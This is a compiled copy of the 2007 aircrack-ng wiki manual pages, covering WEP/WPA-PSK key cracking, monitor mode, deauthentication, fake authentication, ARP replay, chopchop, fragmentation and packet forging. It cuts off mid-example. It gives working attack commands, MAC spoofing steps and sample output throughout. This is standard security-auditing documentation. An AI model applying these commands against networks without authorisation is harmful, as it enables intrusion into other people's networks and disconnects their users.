Aircrack-ng

Description
aircrack is the 802.11 WEP and WPA-PSK keys cracking program that can recover this keys once enough encrypted packets have been captured with airodump-ng. This part of the aircrack-ng suite can perform various statistical attacks to discover WEP keys with small amounts of captured data. For cracking WPA-PSK bruteforce and dictionary methods are included.

Screenshot

LEGEND 1 = Keybyte 2 = Depth of current key search 3 = Byte the IVs leaked 4 = Votes indicating this is correct

How does it work?

When cracking a WEP key, each byte of the key is (basically!) handled individually. With more or less mathematics, the possibility that a certain byte in the key is guessed right goes up to 15% when you catch the right IV, that is leaking the possibly correct byte. In short: The more data you have, the more information you have to make some analysis and calculate the statistics, how possible a certain key is. Then aircrack adds this to his table. In our screenshot above, we can see, that at keybyte 0 the byte 0xAE has collected some votes, 50 in this case. So, mathematically, it is more possible that the key starts with AE than with 11 (which is almost half as possible). With this information, aircrack starts checking the most possible key and then searches its way through the possibility table. If you tell aircrack to use fudge factor 2 (default, -f 2) it takes the votes of the most possible byte, and checks all other possibilities which are at least half as possible as this one. So, its just simple math! ;)

Explaination of the Depth Field

Best explanation is an example. You have the votes like in the screen shot above. For the first byte: AE(50) 11(20) 71(20) 10(12) 84(12) Now you decide to use fudge factor 3, it takes the vote from the most possible byte AE(50): 50 / 3 = 16.666666 Aircrack will test all keys with vote > 16.6666, resulting in AE, 11, 71 being tested, so we have a total depth of three: 0 / 3 AE(50) 11(20) 71(20) 10(12) 84(12) When aircrack is testing keys with AE, it shows 0 / 3, if it has all keys tested with that byte, it switches to the next one and displays: 1 / 3 11(20) 71(20) 10(12) 84(12)

Usage
aircrack-ng [options] <capture file(s)>

You can specify multiple input files (either in .cap or .ivs format). Also, you can run both airodumpng and aircrack-ng at the same time: aircrack-ng will auto-update when new IVs are available. Heres a summary of all available options: Option Param. -a -e -b -p -q -c -t -h -d amode essid bssid nbcpu none none none none start Description Force attack mode (1 = static WEP, 2 = WPA-PSK). If set, all IVs from networks with the same ESSID will be used. This option is also required for WPA-PSK cracking if the ESSID is not broadcasted (hidden). Select the target network based on the access points MAC address. On SMP systems: # of CPU to use. Enable quiet mode (no status output until the key is found, or not). (WEP cracking) Restrict the search space to alpha-numeric characters only (020 0x7F). (WEP cracking) Restrict the search space to binary coded decimal hex characters. (WEP cracking) Restrict the search space to numeric characters (030-039) These keys are used by default in most Fritz!BOXes. (WEP cracking) Set the beginning the WEP key (in hex), for debugging purposes.

-m

maddr

(WEP cracking) MAC address to filter WEP data packets. Alternatively, specify -m ff:ff:ff:ff:ff:ff to use all and every IVs, regardless of the network. (WEP cracking) Specify the length of the key: 64 for 40-bit WEP, 128 for 104-bit WEP, etc. The default value is 128. (WEP cracking) Only keep the IVs that have this key index (1 to 4). The default behaviour is to ignore the key index. (WEP cracking) By default, this parameter is set to 2 for 104-bit WEP and to 5 for 40-bit WEP. Specify a higher value to increase the bruteforce level: cracking will take more time, but with a higher likelyhood of success. (WEP cracking) There are 17 korek statistical attacks. Sometimes one attack creates a huge false positive that prevents the key from being found, even with lots of IVs. Try -k 1, -k 2, ... -k 17 to disable each attack selectively. (WEP cracking) Disable last keybytes brutforce. (WEP cracking) Enable last keybyte bruteforcing (default). (WEP cracking) Enable last two keybytes bruteforcing. (WEP cracking) Disable bruteforce multithreading (SMP only). (WEP cracking) This is an experimental single bruteforce attack which should only be used when the standard attack mode fails with more than one million IVs (WPA cracking) Path to a wordlist or - without the quotes for standard in (stdin).

-n

nbits

-i

index

-f

fudge

-k

korek

-x/-x0 -x1 -x2 -X -y -w

none none none none none words

Usage Examples
The simplest case is to crack a WEP key. If you want to try this out yourself, here is a test file. The key to the test file matches the screen image above, it does not match the following example. aircrack-ng 128bit.ivs Where:

128bit.ivs is the file name containing ivs.

The program responds:

Opening 128bit.ivs Read 684002 packets. # 1 BSSID 00:14:6C:04:57:9B ESSID Encryption WEP (684002 IVs)

Choosing first network as target.

If there were multiple networks contained in the file then you are given the option to select which one you want. By default, aircrack-ng assumes 128 bit encryption. The cracking process starts and once cracked, here is what it looks like:

Aircrack-ng 0.7 r130 [00:00:10] Tested 77 keys (got 684002 IVs) KB 0 1 2 3 4 5 6 7 8 9 10 11 depth 0/ 1 0/ 3 0/ 2 0/ 1 0/ 2 0/ 1 0/ 1 0/ 1 0/ 1 0/ 1 0/ 1 0/ 1 byte(vote) AE( 199) 29( 27) 2D( 66( 41) F1( 33) 4C( 5C( 89) 52( 60) E3( FD( 375) 81( 40) 1D( 24( 130) 87( 110) 7B( E3( 222) 4F( 46) 40( 92( 208) 63( 58) 54( A9( 220) B8( 51) 4B( 14(1106) C1( 118) 04( 39( 540) 08( 95) E4( D4( 372) 9E( 68) A0( 27( 334) BC( 58) F1( 13) 23) 22) 26) 32) 45) 51) 41) 41) 87) 64) 44) 7C( 00( 10( 99( 4F( 7F( 64( 1B( 13( E2( 9F( BE( 12) 19) 20) 26) 25) 28) 35) 39) 30) 79) 55) 42) FE( 9F( F3( D2( D7( DB( 51( 3B( 43( E5( DB( 79( 12) 19) 18) 23) 20) 27) 26) 23) 28) 59) 51) 39) FF( C7( 8B( 33( F4( E0( 53( 9B( 99( 0A( 38( 3B( 6) 18) 15) 20) 18) 27) 25) 23) 25) 44) 40) 37) 39( 64( 8E( 2C( 17( 5B( 75( FA( 79( CC( 9D( E1( 5) 9) 15) 19) 15) 25) 20) 23) 20) 35) 40) 34) 2C( 7A( 14( 05( 8A( 71( 0E( 63( B1( 02( 52( E2( 3) 9) 13) 17) 15) 25) 18) 22) 17) 32) 39) 34) 00( 7B( D2( 0B( CE( 8A( 7D( 2D( 86( C7( A1( 31( 0) 9) 11) 17) 15) 25) 18) 19) 15) 31) 38) 33) 08( F6( 47( 35( E1( 65( D9( 1A( 97( 6C( 54( BF( 0) 9) 10) 17) 15) 23) 18) 17) 15) 30) 36) 33)

KEY FOUND! [ AE:66:5C:FD:24:E3:92:A9:14:39:D4:27:4B ]

This key can then be used to connect to the network. Now onto cracking WPA/WPA2 passphrases. Aircrack-ng can crack either types. aircrack-ng -w password.lst *.cap Where:

-w password.lst is the name of the password file. Remember to specify the full path if the file is not located in the same directory. *.cap is name of group of files containing the ivs. Notice in this case that we used the wildcard * to include multiple files.

The program responds:

Opening wpa2.eapol.cap Opening wpa.cap Read 18 packets. # 1 2 BSSID 00:14:6C:7E:40:80 00:0D:93:EB:B0:8C ESSID Harkonen test Encryption WPA (1 handshake) WPA (1 handshake)

Index number of target network ?

Notice in this case that since there are multiple networks we need to select which one to attack. We select number 2. The program then responds:
Aircrack-ng 0.7 r130 [00:00:03] 230 keys tested (73.41 k/s) KEY FOUND! [ biscotte ] Master Key : CD D7 9A 5A CF B0 70 C7 E9 D1 02 3B 87 02 85 D6 39 E4 30 B3 2F 31 AA 37 AC 82 5A 55 B5 55 24 EE 55 F9 FB 6F 0B DE 65 76 FC 89 D6 5B 4F 67 13 8C 24 A6 A9 D3 84 6D 9F DF F4 2B 2C 13 9A 8E 65 2F 38 46 E4 BC B3 2C A6 DA D0 07 08 6A 89 47 F2 6E 83 6A 5A D9 D2 CE 67 62 49 08 97 CD

Transcient Key : 33 73 AD D9 EAPOL HMAC

: 52 27 B8 3F 73 7C 45 A0 05 97 69 5C 30 78 60 BD

Now you have the passphrase and connect to the network.

Usage Tips
How to make guesses for which option to use
Primarily, you just see the beginning of the key: The votes for the first 5 keybytes are very good, so you can assume they are at least 99.5% correct, and these bytes are for example: 75:47:99:22:50 then it is quite obvious, that the whole key may consist only of numbers, like the first 5 bytes, so it MAY improve your cracking speed when using -t option to only try such keys. If the bytes are 37:30:31:33:36 (all numeric) it is sure a good idea to use -h option. And if the first few bytes are something like 74:6F:70:73:65, you enter them in your hexeditor, and you see, this could be the beginning of some word, then it seems like an ASCII key is used, thus you activate -c option to check only printable ASCII keys.

Other Tips
To specify multiple multiple files at a time you can either use a wildcard such as * or specify each file individually. IE aircrack-ng -w password.lst wpa.cap wpa2.eapol.cap Determining the WPA/WPA2 passphrase is totally dependent on finding a dictionary entry which matches the passphrase. So a quality dictionary is very important. You can search the Internet for dictionaries to be used. There are many available. As you have seen, if there are multiple networks in your files you need to select which one you want to crack. Instead of manually do a selection, you can specify which network you want by essid or bssid on the command line. This is done with the -e or -b parameters. Another trick is to use John the Ripper to create a specific passwords for testing. Lets say you know the passphrase is the street name plus 3 digits. Create a custom rule set in JTR and run something like this:
john --stdout --wordlist=specialrules.lst --rules | aircrack-ng -e test -a 2 -w - /root/capture/wpa.cap

Usage Troubleshooting
Error message Please specify a dictionary (option -w): This means you have mispelt the file name of the dictionary or it is not in the current directory. If the dictionary is located in another directory, you must provide the full path to the dictionary.

aircrack-ng.txt Last modified: 2007/02/12 18:34 by darkaudax

Airdecap-ng
Description
With airdecap-ng you can decrypt WEP/WPA/WPA2 capture files. As well, it can be used to strip the wireless headers from an unencrypted wireless capture.

Usage
airdecap-ng [options] <pcap file>

Option Param. -l -b -k -e -p -w bssid pmk essid pass key

Description dont remove the 802.11 header access point MAC address filter WPA/WPA2 Pairwise Master Key in hex target network ascii identifier target network WPA/WPA2 passphrase target network WEP key in hexadecimal

Usage Examples
The following removes the wireless headers from an open network (no WEP) capture:
airdecap-ng -b 00:09:5B:10:BC:5A open-network.cap

The following decrypts a WEP-encrypted capture using a hexadecimal WEP key:

airdecap-ng -w 11A3E229084349BC25D97E2939 wep.cap

The following decrypts a WPA/WPA2 encrypted capture using the passphrase:

airdecap-ng -e 'the ssid' -p passphrase tkip.cap

Usage Tips
For ESSIDs which contain spaces, put the ESSID in quotes: this contains spaces.

Usage Troubleshooting
None at this time.

airdecap-ng.txt Last modified: 2007/02/21 18:37 by darkaudax

Airmon-ng
Description
This script can be used to enable monitor mode on wireless card interfaces. It may also be used to shut down (stop) interfaces as well. Entering the airmon-ng command without parameters will show the interface status.

Usage
usage: airmon-ng <start|stop> <interface> [channel] Where:

<start|stop> indicates if you wish to start or stop the interface. (Mandatory) <interface> specifies the interface. (Mandatory) [channel] optionally set the card to a specific channel.

Usage Examples
Typical Uses
To start wlan0 in monitor mode: airmon-ng start wlan0 To start wlan0 in monitor mode on channel 8: airmon-ng start wlan0 8 To stop wlan0: airmon-ng stop wlan0 To check the status: airmon-ng

Madwifi-ng driver monitor mode

This describes how to put your interface into monitor mode. After starting your computer, enter iwconfig to show you the current status of the wireless interfaces. It likely looks similar the following output. Enter iwconfig:
lo eth0 wifi0 ath0 no wireless extensions. no wireless extensions. no wireless extensions. IEEE 802.11b ESSID:"" Nickname:"" Mode:Managed Channel:0 Access Point: Not-Associated Bit Rate:0 kb/s Tx-Power:0 dBm Sensitivity=0/3 Retry:off RTS thr:off Fragment thr:off Encryption key:off Power Management:off Link Quality:0 Signal level:0 Noise level:0 Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0

If you want to use ath0 (which is already used): airmon-ng stop ath0 And the system will respond:
Interface wifi0 ath0 Chipset Atheros Atheros Driver madwifi-ng madwifi-ng VAP (parent: wifi0) (VAP destroyed)

Now, if you do iwconfig: System responds:

lo eth0 wifi0 no wireless extensions. no wireless extensions. no wireless extensions.

You can see ath0 is gone. To start ath0 in monitor mode: airmon-ng start wifi0 System responds:
Interface wifi0 ath0 Chipset Atheros Atheros Driver madwifi-ng madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

Now enter iwconfig System responds:

lo eth0 wifi0 ath0 no wireless extensions. no wireless extensions. no wireless extensions. IEEE 802.11g ESSID:"" Nickname:"" Mode:Monitor Frequency:2.457 GHz Access Point: Not-Associated Bit Rate:0 kb/s Tx-Power:15 dBm Sensitivity=0/3 Retry:off RTS thr:off Fragment thr:off Encryption key:off Power Management:off Link Quality=0/94 Signal level=-98 dBm Noise level=-98 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0

You can see ath0 is in monitor mode. If ath1/ath2 etc. is running then stop them first prior to all the commands above:
airmon-ng stop ath1

You can set the channel number by adding it to the end: airmon-ng start wifi0 9

Usage Tips
To confirm that the card is in monitor mode, run the command iwconfig. You can then confirm the mode is monitor and the interface name. For the madwifi-ng driver, the access point field from iwconfig shows your the MAC address of the wireless card. To determine the current channel, enter iwlist <interface name> channel. If you will be working with a specific access point, then the current channel of the card should match that of the AP. In this case, it is a good idea to include the channel number when running the initial airmon-ng command.

Usage Troubleshooting
Nothing at this time.

airmon-ng.txt Last modified: 2007/02/21 19:29 by darkaudax

Aireplay-ng
Description
Aireplay-ng is used to inject frames. The primary function is to generate traffic for the later use in aircrack-ng for cracking the WEP and WPA-PSK keys. There are different attacks which can cause deauthentications for the purpose of capturing WPA handshake data, fake authentications, Interactive packet replay, hand-crafted ARP request injection and ARP-request reinjection. With the packetforge-ng tool its possible to create arbitrary ARP request frames. Most drivers needs to be patched to be able to inject, dont forget to read Installing drivers.

Usage of the attacks

It currently implements a set of five different attacks:

Attack Attack Attack Attack Attack Attack

0: 1: 2: 3: 4: 5:

Deauthentication Fake authentication Interactive packet replay ARP request replay attack KoreK chopchop (CRC prediction) Fragmentation

Fragmentation vs. Chopchop

Here are the differences between the fragmentation and chopchop attacks Fragmentation Pros

Can obtain the full packet length of 1500 bytes xor. This means you can subsequently pretty well create any size of packet. Even in cases where less then 1500 bytes are collected, there is sufficient to create ARP requests. May work where chopchop does not. Is extremely fast. It yields the xor stream extremely quickly when successful.

Cons

Need more information to launch it - IE IP address info. Quite often this can be guessed. Better still, aireplay-ng assumes source and destination IPs of 255.255.255.255 if nothing is specified. This will work successfully on most APs. So this is a limited con. Setup to execute the attack is more subject to the device drivers. For example, Atheros does not generate the correct packets unless the wireless card is set to the mac address you are spoofing. You need to be physically closer to the access point since if any packets are lost then the attack fails.

Chopchop Pros

May work where fragmentation does not work. You dont need to know any IP information.

Cons

Cannot be used against every access point. The maximum xor bits is limited to the length of the packet you chopchop against. Much slower then the fragmentation attack

Usage Troubleshooting
This item applies to all modes of aireplay-ng. Make sure there are no other VAPs running. There can be issues when creating a new VAP in monitor mode and there was an existing VAP in managed mode. You should first stop ath0 then start wifi0:
airmon-ng stop ath0 airmon-ng start wifi0

or
wlanconfig ath0 destroy wlanconfig ath create wlandev wifi0 wlanmode monitor

aireplay-ng.txt Last modified: 2007/02/21 21:15 by darkaudax

Deauthentication
Description
This attack sends disassocate packets to one or more clients which are currently associated with a particular access point. Disassociating clients can be done for a number of reasons:

Recovering a hidden ESSID. This is an ESSID which is not being broadcast. Another term for this is cloaked. Capturing WPA/WPA2 handshakes by forcing clients to reauthenticate Generate ARP requests (Windows clients sometimes flush their ARP cache when disconnected)

Of course, this attack is totally useless if there are no associated wireless clients.

Usage
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

Where:

-0 means deauthentication 1 is the number of deauths to send (you can send muliple if you wish); 0 means send them continuously -a 00:14:6C:7E:40:80 is the MAC address of the access point -c 00:0F:B5:34:30:30 is the MAC address of the client to deauthenticate; if this is omitted then all clients are deauthenticated ath0 is the interface name

Usage Examples
Typical Deauthentication
First, you determine a client which is currently connected. You need the MAC address for the following command: aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0 Where:

-0 means deauthentication 1 is the number of deauths to send (you can send muliple if you wish) -a 00:14:6C:7E:40:80 is the MAC address of the access point -c 00:0F:B5:34:30:30 is the MAC address of the client you are deauthing ath0 is the interface name

Here is what the ouput looks like:

11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]

WPA/WPA2 Handshake capture with an Atheros

airmon-ng start ath0 airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0 (switch to another console) aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0 (wait for a few seconds) aircrack-ng -w /path/to/dictionary out.cap

Here the explaination of the above commands: airodump-ng -c 6 bssid 00:14:6C:7E:40:80 -w out ath0 Where:

-c 6 is the channel to listen on bssid 00:14:6C:7E:40:80 limits the packets collected to this one access point -w out is the file prefix of the file name to be written ath0 is the interface name

aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0 Where:

-0 means deauthentication attack 5 is number of groups of deauthentication packets to send out -a 00:14:6C:7E:40:80 is MAC address of the access point -c 00:0F:B5:AB:CB:9D is MAC address of the client to be deauthenticated ath0 is the interface name

Here is what the output looks like from aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0
12:55:56 12:55:56 12:55:57 12:55:58 12:55:58 Sending Sending Sending Sending Sending DeAuth DeAuth DeAuth DeAuth DeAuth to to to to to station station station station station -----STMAC: STMAC: STMAC: STMAC: STMAC: [00:0F:B5:AB:CB:9D] [00:0F:B5:AB:CB:9D] [00:0F:B5:AB:CB:9D] [00:0F:B5:AB:CB:9D] [00:0F:B5:AB:CB:9D]

ARP request generation with a Prism2 card

airmon-ng start wlan0 airodump-ng -c 6 -w out --bssid 00:13:10:30:24:9C wlan0 (switch to another console) aireplay-ng -0 10 -a 00:13:10:30:24:9C wlan0 aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0

After sending the ten batches of deauthentication packets, we start listening for ARP requests with attack 3. The -h option is mandatory and has to be the MAC address of an associated client. If the driver is wlan-ng/, you should run the airmon-ng script (unless you know what to type) otherwise the card wont be correctly setup for injection.

Usage Tips
It is usually more effective to target a specific station using the -c parameter. The deauthentication packets are sent directly from your PC to the clients. So you must be physically close enough to the clients for your wireless card transmissions to reach them.

Usage Troubleshooting
None at this time.

deauthentication.txt Last modified: 2007/02/21 20:21 by darkaudax

Fake authentication
This attack is only useful when you need an associated MAC address in attacks 2, 3, 4 (-h option) and there is currently no associated client. However it is genereally better to use the MAC address of a real client (like here, 00:09:5B:EB:C5:2B) in attacks 2, 3 and 4. The fake auth attack does NOT generate ARP requests. Also, subsequent attacks will likely perform better if you update the MAC address of the card, so that it properly sends ACKs:
ifconfig ath0 down ifconfig ath0 hw ether 00:11:22:33:44:55 ifconfig ath0 up aireplay-ng -1 0 -e 'the ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0 12:14:06 Sending Authentication Request 12:14:06 Authentication successful 12:14:06 Sending Association Request 12:14:07 Association successful :-)

With patched madwifi-old CVS 2005-08-14, its possible to inject packets while in Managed mode (the WEP key itself doesnt matter, as long as the AP accepts Open-System authentication). So, instead of running attack 1, you may just associate and inject / monitor through the athXraw interface:
ifconfig ath0 down hw ether 00:11:22:33:44:55 iwconfig ath0 mode Managed essid 'the ssid' key AAAAAAAAAA ifconfig ath0 up sysctl -w dev.ath0.rawdev=1 ifconfig ath0raw up airodump-ng ath0raw out 6

Then you can run attack 3 or 4 (aireplay-ng will automatically replace ath0 with ath0raw below):
aireplay-ng -3 -h 00:11:22:33:44:55 -b 00:13:10:30:24:9C ath0 aireplay-ng -4 -h 00:10:20:30:40:50 -f 1 ath0

Some access points require to reassociate every 30 seconds, otherwise our fake client is considered disconnected. In this case, setup the periodic re-association delay:
aireplay-ng -1 30 -e 'the ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0

If this attacks seems to fail (aireplay-ng keeps sending authentication requests), MAC address filtering may be in place. Also make sure that:

You are close enough to the access point.

The driver is properly patched and installed. The card is configured on the same channel as the AP. The BSSID and ESSID (-a / -e options) are correct. If Prism2, make sure the firmware was updated.

fake_authentication.txt Last modified: 2006/11/19 16:12

Interactive packet replay

This attack allows you to choose a given packet for replaying; it sometimes gives more effective results than attack 3 (ARP-request reinjection). You could use it, for example, to attempt the any data re-broadcast attack, which only works if the AP actually reencrypts WEP data packets:
aireplay-ng -2 -b 00:13:10:30:24:9C -n 100 -p 0841 -h 00:09:5B:EB:C5:2B -c FF:FF:FF:FF:FF:FF ath0

You can also use attack 2 to manually replay WEP-encrypted ARP request packets, which size is either 68 or 86 bytes (depending on the operating system):
aireplay-ng -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF -m 68 -n 68 -p 0841 -h 00:09:5B:EB:C5:2B ath0 aireplay-ng -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF -m 86 -n 86 -p 0841 -h 00:09:5B:EB:C5:2B ath0

Another good idea is to capture some traffic and then have a look at it with Wireshark. If two packets are looking like a request and a response (One client sends a packet and very short time later the receiver is answering to it) then it is a good idea to try to reinject the request packet to get answers.

interactive_packet_replay.txt Last modified: 2007/01/03 19:49 by mister_x

ARP Request Replay Attack

Description
The classic ARP request replay attack is the most effective way to generate new initialization vectors (IVs), and works very reliably. The program listens for an ARP packet then retransmits it back to the access point. This, in turn, causes the access point to repeat the ARP packet with a new IV. The program retransmits the same ARP packet over and over. However, each ARP packet repeated by the access point has a new IVs. It is all these new IVs which allow you to determine the WEP key. ARP is address resolution protocol: A TCP/IP protocol used to convert an IP address into a physical address, such as an Ethernet address. A host wishing to obtain a physical address broadcasts an ARP request onto the TCP/IP network. The host on the network that has the address in the request then replies with its physical hardware address.

Usage
Basic usage:
aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0

Where:

-3 means standard arp request replay -b 00:13:10:30:24:9C is the access point MAC address -h 00:11:22:33:44:55 is the source MAC address (either an associated client or from fake authentication) ath0 is the wireless interface name

Replaying a previous arp replay. This is a special case of the interactive packet replay attack. It is present here since it is complementary to the ARP requeste replay attack.
aireplay-ng -2 -r replay_arp-0219-115508.cap ath0

Where:

-2 means interactive frame selection -r replay_arp-0219-115508.cap is the name of the file from your last successful ARP replay

ath0 is the wireless card interface name

Usage Example
For all of these examples, use airmon-ng to put your card in monitor mode first. You cannot inject packets unless it is in monitor mode. For this attack, you need either the MAC address of an associated client , or a fake MAC from attack 1. The simplest and easiest way is to utilize the MAC address of an associated client. This can be obtain via airodump-ng. The reason for using an associated MAC address is that the access point will only accecpt and repeat packets where the sending MAC address is associated. You may have to wait for a couple of minutes, or even longer, until an ARP request shows up. This attack will fail if there is no traffic. Enter this command:
aireplay-ng -3 -b 00:14:6c:7e:40:80 -h 00:0F:B5:88:AC:82 ath0

The system responds:

Saving ARP requests in replay_arp-0219-123051.cap You should also start airodump-ng to capture replies. Read 11978 packets (got 7193 ARP requests), sent 3902 packets...

Initally the last line will look similar to:

Read 39 packets (got 0 ARP requests), sent 0 packets...

Then when the attack is in progress, the zeroes show the actual counts as in the full sample above. You can also confirm this by running airodump-ng to capture the IVs being generated. It should show the data count increasing rapidly for the specific access point. The second example we will look at is reusing the captured ARP from the example above. You will

notice that it said the ARP requests were being saved in replay_arp-0219-123051.cap. So rather then waiting for a new ARP, we simply reuse the old ones with the -r parameter:
aireplay-ng -2 -r replay_arp-0219-123051.cap ath0

The system responds:

Size: 86, FromDS: 0, ToDS: 1 (WEP) BSSID Dest. MAC Source MAC 0x0000: 0x0010: 0x0020: 0x0030: 0x0040: 0x0050: = = = 00:14:6C:7E:40:80 FF:FF:FF:FF:FF:FF 00:0F:B5:88:AC:82 0000 ffff 36c6 a08e 1930 0d9e 0014 ffff 2b2c 207c 742a 4731 6c7e 7092 a79b 17c6 c85f 4080 e627 08f8 43e3 2699 000f 0000 0c7e fe8f dabe b588 7238 f436 1a46 1368 ac82 937c 14f7 4981 df39 .A....l~@....... ......p..'..r8.| ..6.+,.....~.6.. .x.. |..C....FI. .|.0t*._&....h.9 ....G1

0841 ffff 8011 8078 947c ca97

Use this packet ? y

You say y and then your system will start injecting:

Saving chosen packet in replay_src-0219-123117.cap You should also start airodump-ng to capture replies. Sent 3181 packets...

At this point, if you have not already done so, start airmon-ng to capture the IVs being generated. They data count should be inscreasing rapidly.

Usage Tips
When you are testing at home, to generate an ARP packet to initiate the ARP injection, simply ping a non-existent IP on your network.

Usage Troubleshooting
See Tutorial: I am injecting but the IVs don't increase!

arp-request_reinjection.txt Last modified: 2007/02/19 19:37 by darkaudax

KoreK chopchop
This attack, when successful, can decrypt a WEP data packet without knowing the key. It can even work against dynamic WEP. This attack does not recover the WEP key itself, but merely reveals the plaintext. However, some access points are not vulnerable at all. Some may seem vulnerable at first but actually drop data packets shorter that 60 bytes. If the access point drops packets shorter than

42 bytes, aireplay tries to guess the rest of the missing data, as far as the headers are predictable. If an IP packet is captured, it additionally checks if the checksum of the header is correct after guessing the missing parts of it. This attack requires at least one WEP data packet. 1. First, we decrypt one packet
aireplay-ng -4 ath0

If this isnt successful, in most cases the access point just drops the data because it does not know the MAC which is sending it. In this case we have to use the MAC adress of a connected client which is allowed to send data over the network:
aireplay-ng -4 -h 00:09:5B:EB:C5:2B ath0

2. Lets have a look at the IP address

tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap reading from file replay_dec-0627-022301.cap, link-type [...] IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1

3. Then, forge an ARP request The source IP (192.168.1.100) doesnt matter, but the destination IP (192.168.1.2) must respond to ARP requests. The source MAC must belong to an associated station, in case the access point is filtering unauthenticated traffic.
packetforge-ng replay_dec-0627-022301.xor 1 00:13:10:30:24:9C 00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap

4. And replay our forged ARP request

aireplay-ng -2 -r arp.cap ath0

See ChopchopTheory

korek_chopchop.txt Last modified: 2007/01/22 22:12 by jeroenimo

Fragmentation Attack
Description
This attack, when successful, can obtain 1500 bits of PRGA (pseudo random generation algorithm). This attack does not recover the WEP key itself, but merely obtains the PRGA. The PRGA can then be used to generate packets with packetforge-ng which are in turn used for various injection attacks. It requires at least one data packet needs to be received from the access point in order to initiate the attack. Basically, the program obains a small amount of keying material from the packet then attempts to send ARP and/or LLC packets with known content to the access point (AP). If the packet is successfully echoed back by the AP then a larger amount of keying information can be obtained from the returned packet. This cycle is repeated a several times until 1500 bits of PRGA are obtained or sometimes less then 1500 bits. The original paper by Andrea Bittau at http://www.toorcon.org/2005/slides/abittau/paper.pdf provides a much more detailed technical description of the technique.

Usage
aireplay-ng -5 -b 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D ath0 Where:

-5 means run the fragmentation attack -b 00:14:6C:7E:40:80 is access point MAC address -h 00:0F:B5:AB:CB:9D is source MAC address of the packets to be injected ath0 is the interface name

Optionally, the following filters can be applied:

-b bssid : MAC address, Access Point -d dmac : MAC address, Destination -s smac : MAC address, Source -m len : minimum packet length -n len : maximum packet length -u type : frame control, type field -v subt : frame control, subtype field -t tods : frame control, To DS bit -f fromds : frame control, From DS bit -w iswep : frame control, WEP bit

Optionally, the following replay options can be set:

-k IP : set destination IP in fragments - defaults to 255.255.255.255 -l IP : set source IP in fragments - defaults to 255.255.255.255

Usage Example
Notes:

The source MAC address used in the attack must be associated with the access point. To do this, you can use fake authentication or use a MAC address of existing wireless client. For madwifi-ng drivers (Atheros chipset), you must change MAC address of your card to the MAC address you will injecting with otherwise the attack will not work.

Essentially you start the attack with the following command then select the packet you want to try:
aireplay-ng -5 -b 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D ath0 Waiting for a data packet... Read 96 packets... Size: 120, FromDS: 1, ToDS: 0 (WEP) BSSID Dest. MAC Source MAC 0x0000: 0x0010: 0x0020: 0x0030: 0x0040: 0x0050: 0x0060: 0x0070: = = = 00:14:6C:7E:40:80 00:0F:B5:AB:CB:9D 00:D0:CF:03:34:8C 0201 cf03 b1e0 2a70 f7f3 66a2 1544 933f 000f 348c 92a8 49cf 5953 030f bd82 af2f b5ab e0d2 039b eef8 1234 472d ad77 740e cb9d 4001 ca6f f9b9 5727 2682 fe9a 0014 0000 cecb 279c 146c 3957 cd99 6c7e 2b62 5364 9020 eeaa 8429 a43c 4080 7a01 6e16 30c4 a594 9ca5 52a1 .B..........l~@. ....4...@...+bz. mm.......o..Sdn. ..*pI.....'.. 0. p...YS.4W'.l.... .Uf...G-&.9W.).. Q.D...w.....<R. ...?./t.

0842 00d0 6d6d a21d 7013 fd55 517f 0505

Use this packet ? y

The program responds (or similar):

Saving chosen packet in replay_src-0124-161120.cap Data packet found! Sending fragmented packet Got RELAYED packet!! Thats our ARP packet! Trying to get 384 bytes of a keystream Got RELAYED packet!! Thats our ARP packet! Trying to get 1500 bytes of a keystream Got RELAYED packet!! Thats our ARP packet! Saving keystream in fragment-0124-161129.xor Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

You have successfully obtained the PRGA which is stored in the file named by the program. You can now use packetforge-ng to generate one or more packets to be used for various injection attacks.

fragmentation.txt Last modified: 2007/02/13 02:50 by darkaudax

Packetforge-ng
Description
The purpose of packetforge-ng is to create encrypted packets that can subsequently be used for injection. You may create various types of packets such as arp requests, UDP, ICMP and custom packets. The most common use is to create ARP requests for subsequent injection. To create an encrypted packet, you must have a PRGA (pseudo random genration algorithm) file. This is used to encrypt the packet you create. This is typically obtained from aireplay-ng chopchop or fragmentation attacks.

Usage
Usage: packetforge-ng <mode> <options>

Forge options:

-p <fctrl> : set frame control word (hex) -a <bssid> : set Access Point MAC address -c <dmac> : set Destination MAC address -h <smac> : set Source MAC address -j : set FromDS bit -o : clear ToDS bit -e : disables WEP encryption -k <ip[:port]> : set Destination IP [Port] -l <ip[:port]> : set Source IP [Port] -t ttl : set Time To Live -w <file> : write packet to this pcap file

Source options:

-r <file> : read packet from this raw file -y <file> : read PRGA from this file

Modes:

arp : forge an ARP packet (-0) udp : forge an UDP packet (-1) icmp : forge an ICMP packet (-2) custom : build a custom packet (-9)

Usage Example
Here is an example of how to generate an arp request packet. First, obtain a xor file (PRGA) with either the aireplay-ng chopchop or fragmentation method. Then use the following command:
